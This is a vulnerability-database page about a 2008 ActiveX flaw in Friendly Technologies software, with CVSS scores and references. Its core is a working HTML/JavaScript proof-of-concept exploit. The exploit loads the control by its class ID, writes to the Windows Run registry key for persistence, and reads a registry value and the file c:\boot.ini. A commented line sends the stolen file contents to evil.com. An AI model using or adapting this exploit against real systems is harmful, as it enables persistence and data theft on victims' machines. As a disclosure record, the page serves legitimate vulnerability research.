Friendly Technologies Read/Write Registry/Read Files Exploit

2008-09-14 / 2008-09-15
Credit: spdr
Risk: High
Local: No
Remote: No
CWE: CWE-20


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- Proof of Concept... Read write to registry and also read files More codes at irc.nix.co.il/#binaryvision ! --> <html> <title>Friendly Technologies - Read/Write Registry</title> <object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id='FT'></object> <script language='Javascript'> // Write to Registry FT.RegistryValue (1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "Key Name Here", 1) = "Input Here"; // Read from Registry var readreg = FT.RegistryValue (1, "SOFTWARE\\Friendly Technologies\\FriendlyWeb Dialer", "Version", 1); alert(readreg); // Read from file var readme=FT.GetTextFile("c:\\boot.ini"); alert(readme); // <img src="http://evil.com/postfiles.php?input="+readme ... </script>

References:

http://www.securityfocus.com/bid/30940
http://www.securityfocus.com/bid/30939
http://www.milw0rm.com/exploits/6334
http://secunia.com/advisories/31644


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top